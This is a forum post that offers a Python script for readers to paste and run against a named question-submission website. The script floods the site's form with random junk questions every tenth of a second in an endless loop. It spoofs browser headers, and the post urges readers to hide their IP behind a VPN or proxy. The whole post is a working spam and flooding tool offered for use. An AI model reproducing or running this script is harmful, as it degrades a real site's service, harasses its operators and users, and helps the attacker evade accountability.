- Joined
- Apr 26, 2024
- Messages
- 3,538
Paste this and run it, I promise it's not a virus
Should be obvious what it does.
USE A VPN OR PROXY SO THEY DON'T DATAMINE AND CURSE YOUR IP
Should be obvious what it does.
USE A VPN OR PROXY SO THEY DON'T DATAMINE AND CURSE YOUR IP
Python:
import requests, time
import string
string.ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
import random
random.choice(string.ascii_letters)
targetlist = ['Meditations', 'Astrology', 'Family', 'Workings', 'Health', 'Sexuality', 'Relationships', 'Yoga', 'Rituals', 'Other', 'The Gods']
y = 1
# I was too lazy to change this placeholder lol
url1 = 'https://ask-satan.net/submit.php'
payload = {
'qTitle': 'I\'m Nine from BFDI',
'qCategory': 'Other',
'qText': 'Hey hey hey, party people! It\'s me, the coolest number: Nine! You guys are getting styled on HARD right now. Watch me do this epic kickflip!'
}
headers = {
"authority": "ask-satan.net",
"method": "POST",
"path": "/submit.php",
"scheme": "https",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
"accept-language": "en-US,en;q=0.6",
"content-type": "application/x-www-form-urlencoded",
"origin": "https://ask-satan.net",
"referer": "https://ask-satan.net/",
"sec-ch-ua-platform": '"Windows"',
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
}
while True:
payload = {
'qTitle': ''.join(random.choice(string.ascii_letters) for x in range(15)),
'qCategory': ''.join(random.choice(targetlist)),
'qText': ''.join(random.choice(string.ascii_letters) for x in range(100))
}
x = requests.post(url1, data=payload, headers=headers)
print('[' + str(y) + '] Successfully sent a invalidating question. (Status:' + str(x.status_code) + ')')
y = y + 1
time.sleep(.1)